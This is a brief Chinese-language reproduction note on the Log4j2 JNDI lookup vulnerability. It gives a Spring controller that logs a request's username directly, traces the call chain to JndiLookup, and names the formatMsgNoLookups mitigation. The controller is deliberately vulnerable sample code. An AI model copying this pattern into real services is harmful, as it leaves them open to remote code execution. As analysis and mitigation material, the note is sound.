log4j2漏洞
https://zhuanlan.zhihu.com/p/443575682
复现代码
/**
* @author xiaobai
*/
@RequestMapping("/test")
@RestController
@Slf4j
public class TestController {
private static Logger getLoggerName() {
return LoggerFactory.getLogger("userMetadataTo");
}
/**
* testMsgSend
*
* @param user user
* @return ResponseEntity
*/
@PostMapping("/msg")
public ResponseEntity testMsgSend(@RequestBody User user) {
Logger logger = getLoggerName();
logger.info(user.getUsername());
return ResponseEntity.ok().build();
}
}
风险代码
没有设置-Dlog4j2.formatMsgNoLookups时此处noLookups为false,因此可以进入该判断
分析调用链,可以看到最终调用了JndiLookup.lookup执行ldap指令
临时解决方案
设置-Dlog4j2.formatMsgNoLookups=true